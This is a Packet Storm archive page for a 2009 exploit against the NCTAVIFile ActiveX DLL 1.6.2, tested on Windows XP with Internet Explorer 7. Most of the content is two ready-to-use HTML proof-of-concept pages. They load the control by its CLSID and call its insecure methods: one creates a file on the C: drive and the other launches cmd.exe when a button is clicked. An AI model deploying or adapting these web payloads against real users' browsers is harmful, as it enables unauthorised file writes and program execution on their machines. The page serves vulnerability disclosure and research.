what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NCTAVIFile File Creation / Execution

NCTAVIFile File Creation / Execution
Posted Sep 21, 2009
Authored by the_Edit0r

NCTAVIFile Active-X DLL version 1.6.2 suffers from an insecure file creation and execution vulnerability.

tags | exploit, activex
SHA-256 | dd94df3aba90558aec4635e304c81c3236c5584c19b559a632f17e32b6991a28

NCTAVIFile File Creation / Execution

Change Mirror Download
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""" :::::: :: :: :: :: :: :::: """
""" :: :: :: :: :::::: .. :::: :: """
""" ::::: ::: ::::: :: :: :: :: :: :::: """
""" :: :: :: :: : :: :: :: :: :: :: """
""" :::::: :: :: ::::: :: :::::: :: :: :::: rs.ir """
""" :: """
""" """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Anti-Security Research Team & Security Institute

#[+] Bug : NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation/File execution exploit
#[+] program Download : http://www.nctsoft.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member

# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------

<HTML>
<b> NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation </b>

<BODY>
<object classid='clsid:6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790' id='expl'></object>
<SCRIPT>

/*
targetFile = "C:\WINDOWS\system32\NCTAVIFile.dll"
prototype = "Sub CreateFile ( ByVal fileName As String )"
memberName = "CreateFile"
progid = "NCTAVIFileLib.AVIFileM"
argCount = 1
*/

function Boom()
{
File = "c:\\system_.ini"
expl.CreateFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Boom() type=button value="Click Here For Test Exploit">
</body>
</HTML>

---------------------------------------

<HTML>
<BODY>
<object id=expl classid="clsid:{6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790}"></object>

<SCRIPT>

function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
expl.OpenFile(File)
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close